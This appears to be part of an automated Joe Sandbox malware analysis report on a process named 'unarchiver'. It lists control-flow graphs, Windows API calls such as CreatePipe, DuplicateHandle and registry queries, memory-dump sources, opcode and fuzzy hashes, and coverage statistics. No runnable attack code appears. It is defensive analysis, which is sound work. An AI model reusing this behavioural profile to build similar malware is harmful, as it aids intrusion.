                                                                                                            control_flow_graph 225 cfb30a-cfb3af 230 cfb407-cfb40c 225->230 231 cfb3b1-cfb3b9 DuplicateHandle 225->231 230->231 233 cfb3bf-cfb3d1 231->233 234 cfb40e-cfb413 233->234 235 cfb3d3-cfb404 233->235 234->235
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00CFB3B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 209a6d001af1a9939916cfe6c733d409b9243e5f522cdcf7e54bf1a942d94198
                                                                                                            • Instruction ID: dbd74ac851b7c6b8af94369c3993e5545fb5a1d7c169737a768cff58edd175da
                                                                                                            • Opcode Fuzzy Hash: 209a6d001af1a9939916cfe6c733d409b9243e5f522cdcf7e54bf1a942d94198
                                                                                                            • Instruction Fuzzy Hash: 0431B271404384AFEB228B65DC45FA6BFBCEF05310F04859AF985CB592D234A919CB71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 239 cfadc8-cfae63 244 cfaebb-cfaec0 239->244 245 cfae65-cfae6d DuplicateHandle 239->245 244->245 246 cfae73-cfae85 245->246 248 cfae87-cfaeb8 246->248 249 cfaec2-cfaec7 246->249 249->248
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00CFAE6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 867909b017b1ffbc4923560d64040bfb1287ddcb41099a6bcae241cf397a5c86
                                                                                                            • Instruction ID: e06cbf368bb5c18041b8301a6d1724be18b3d71c390cac1ce7245e2b081f7cfa
                                                                                                            • Opcode Fuzzy Hash: 867909b017b1ffbc4923560d64040bfb1287ddcb41099a6bcae241cf397a5c86
                                                                                                            • Instruction Fuzzy Hash: 4331AF72104344AFEB228B65DC44FA7BFACEF05320F0489AEF985CB152D234A919CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 253 cfac3a-cfad2b CreatePipe
                                                                                                            APIs
                                                                                                            • CreatePipe.KERNELBASE(?,00000E2C,?,?), ref: 00CFACFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreatePipe
                                                                                                            • String ID:
                                                                                                            • API String ID: 2719314638-0
                                                                                                            • Opcode ID: d24234fda18592060df7794324c17eecfc0bc3dd68c8c8b674eb671b631f05c1
                                                                                                            • Instruction ID: da64b15c3da8e678b1700b8569a1d5d9061fdc04097822ff31e7ff974926d7df
                                                                                                            • Opcode Fuzzy Hash: d24234fda18592060df7794324c17eecfc0bc3dd68c8c8b674eb671b631f05c1
                                                                                                            • Instruction Fuzzy Hash: 4631AD6240E3C06FD7038B758C61AA2BFB4AF47610F1E84CBD9C4CF1A3D2696919C762
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 259 cfa4e8-cfa562 263 cfa567-cfa573 259->263 264 cfa564 259->264 265 cfa578-cfa581 263->265 266 cfa575 263->266 264->263 267 cfa583-cfa5a7 CreateFileW 265->267 268 cfa5d2-cfa5d7 265->268 266->265 271 cfa5d9-cfa5de 267->271 272 cfa5a9-cfa5cf 267->272 268->267 271->272
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00CFA589
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: aae682a8c74320229516169fd2afc1d3ebb87cb5a291ca83f4b9fc09471d8854
                                                                                                            • Instruction ID: 89605f4045b573399b3a8944aa1df0c247dd10eedf8210fcf8cc3ef46158d45d
                                                                                                            • Opcode Fuzzy Hash: aae682a8c74320229516169fd2afc1d3ebb87cb5a291ca83f4b9fc09471d8854
                                                                                                            • Instruction Fuzzy Hash: C1316DB1504744AFE722CF65DC44B66FFE8EF05310F08849EEA858B652D275E908CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 280 cfa9ec-cfaa4f 283 cfaa54-cfaa5d 280->283 284 cfaa51 280->284 285 cfaa5f 283->285 286 cfaa62-cfaa68 283->286 284->283 285->286 287 cfaa6d-cfaa84 286->287 288 cfaa6a 286->288 290 cfaabb-cfaac0 287->290 291 cfaa86-cfaa99 RegQueryValueExW 287->291 288->287 290->291 292 cfaa9b-cfaab8 291->292 293 cfaac2-cfaac7 291->293 293->292
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFAA8C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: 311655a0169df714c1d6d9a50957a895ce40e15645c1ba529c3eafa46e41e2b3
                                                                                                            • Instruction ID: 3aba157f7bd16225d979552f3c00520a8ea5a56875db9c44af50e7ea116d2a9a
                                                                                                            • Opcode Fuzzy Hash: 311655a0169df714c1d6d9a50957a895ce40e15645c1ba529c3eafa46e41e2b3
                                                                                                            • Instruction Fuzzy Hash: AF2180B2505744AFE721CF15CC44FA6FBFCEF05710F08849AE989CB252D224E908CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 275 cfa120-cfa1f3 FindNextFileW
                                                                                                            APIs
                                                                                                            • FindNextFileW.KERNELBASE(?,00000E2C,?,?), ref: 00CFA1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2029273394-0
                                                                                                            • Opcode ID: d7558420454e13a39a40148c1b20f147ad429deead384bff317179bacb919920
                                                                                                            • Instruction ID: 95dc1d7bdf9b32e0581631b2875541625a0d4977af6204fbac875442202f58f7
                                                                                                            • Opcode Fuzzy Hash: d7558420454e13a39a40148c1b20f147ad429deead384bff317179bacb919920
                                                                                                            • Instruction Fuzzy Hash: 6621A17140D3C06FD7138B358C51BA6BFB4EF47620F1981DBD9848F693D225A91ACBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 297 cfadee-cfae63 301 cfaebb-cfaec0 297->301 302 cfae65-cfae6d DuplicateHandle 297->302 301->302 303 cfae73-cfae85 302->303 305 cfae87-cfaeb8 303->305 306 cfaec2-cfaec7 303->306 306->305
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00CFAE6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 58d976464691ed9c690f01ed4787c35175ffe95afd9aec253d6b55e2eeae9bbc
                                                                                                            • Instruction ID: cfa4cf9d62fb799560c5f4da2a5b0abbf59f9cd0c92b80331f84e170b5a17a8a
                                                                                                            • Opcode Fuzzy Hash: 58d976464691ed9c690f01ed4787c35175ffe95afd9aec253d6b55e2eeae9bbc
                                                                                                            • Instruction Fuzzy Hash: BF21A472500208AFEB21DF69DC44F6BFBACEF04310F14896AFA45CB651D674E9148B72
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 310 cfb33a-cfb3af 314 cfb407-cfb40c 310->314 315 cfb3b1-cfb3b9 DuplicateHandle 310->315 314->315 317 cfb3bf-cfb3d1 315->317 318 cfb40e-cfb413 317->318 319 cfb3d3-cfb404 317->319 318->319
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00CFB3B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: e6da39d2652667c69c53e4d684841f4f7ad2bd2cc4f78e4e67167c089d4f8f4b
                                                                                                            • Instruction ID: 8ba15dfb77ff06d4bb2c16c8a6af4c0b02528b2145ff7ca3d8f0004d6285b347
                                                                                                            • Opcode Fuzzy Hash: e6da39d2652667c69c53e4d684841f4f7ad2bd2cc4f78e4e67167c089d4f8f4b
                                                                                                            • Instruction Fuzzy Hash: 3721A471500208AFEB21DF69DC45F6AFBACEF04310F14856AFA85CB651D774E9188B71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 323 cfa75c-cfa7e2 327 cfa826-cfa82b 323->327 328 cfa7e4-cfa804 SetFilePointer 323->328 327->328 331 cfa82d-cfa832 328->331 332 cfa806-cfa823 328->332 331->332
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA7EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 7cbdd49eaa25aac1fe2e6572b4ee0ad3b5c81aab399ed90976aa39560c869ef6
                                                                                                            • Instruction ID: 55015d8ccb2e9715d75f40ebe4508ebb74ea46206a54bd388061bdea124df82b
                                                                                                            • Opcode Fuzzy Hash: 7cbdd49eaa25aac1fe2e6572b4ee0ad3b5c81aab399ed90976aa39560c869ef6
                                                                                                            • Instruction Fuzzy Hash: CA21A4714093846FE7128B24DC44F66BFB8EF46710F1984EAE9848F193D274A909C772
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 347 cfaae2-cfab2b 348 cfab2e-cfab86 RegQueryValueExW 347->348 350 cfab8c-cfaba2 348->350
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 00CFAB7E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 335 cfa83f-cfa8c5 339 cfa909-cfa90e 335->339 340 cfa8c7-cfa8e7 ReadFile 335->340 339->340 343 cfa8e9-cfa906 340->343 344 cfa910-cfa915 340->344 344->343
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA8CD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 351 cfa50a-cfa562 354 cfa567-cfa573 351->354 355 cfa564 351->355 356 cfa578-cfa581 354->356 357 cfa575 354->357 355->354 358 cfa583-cfa58b CreateFileW 356->358 359 cfa5d2-cfa5d7 356->359 357->356 360 cfa591-cfa5a7 358->360 359->358 362 cfa5d9-cfa5de 360->362 363 cfa5a9-cfa5cf 360->363 362->363
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00CFA589
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 366 cfa69b-cfa719 370 cfa74e-cfa753 366->370 371 cfa71b-cfa72e GetFileType 366->371 370->371 372 cfa755-cfa75a 371->372 373 cfa730-cfa74d 371->373 372->373
                                                                                                            APIs
                                                                                                            • GetFileType.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA721
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID:
                                                                                                            • API String ID: 3081899298-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 377 cfa5e0-cfa5ec 378 cfa5ee-cfa605 377->378 379 cfa606-cfa64c 377->379 378->379 381 cfa64e-cfa656 FindCloseChangeNotification 379->381 382 cfa68d-cfa692 379->382 383 cfa65c-cfa66e 381->383 382->381 385 cfa694-cfa699 383->385 386 cfa670-cfa68c 383->386 385->386
                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00CFA654
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?), ref: 00CFA997
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory
                                                                                                            • String ID:
                                                                                                            • API String ID: 4241100979-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFAA8C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA8CD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA7EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 00CFA30C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID:
                                                                                                            • API String ID: 1863332320-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetFileType.KERNELBASE(?,00000E2C,6A915445,00000000,00000000,00000000,00000000), ref: 00CFA721
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID:
                                                                                                            • API String ID: 3081899298-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?), ref: 00CFA997
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory
                                                                                                            • String ID:
                                                                                                            • API String ID: 4241100979-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 00CFB2CC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 31276548-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • FindNextFileW.KERNELBASE(?,00000E2C,?,?), ref: 00CFA1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2029273394-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreatePipe.KERNELBASE(?,00000E2C,?,?), ref: 00CFACFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreatePipe
                                                                                                            • String ID:
                                                                                                            • API String ID: 2719314638-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 00CFAB7E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00CFA654
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID:
                                                                                                            • API String ID: 1863332320-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 00CFA30C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441095347.00000000010B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_10b0000_unarchiver.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441095347.00000000010B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_10b0000_unarchiver.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440817454.0000000000CF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF2000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cf2000_unarchiver.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440817454.0000000000CF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF2000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cf2000_unarchiver.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:3.9%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:2.1%
                                                                                                            Total number of Nodes:2000
                                                                                                            Total number of Limit Nodes:63
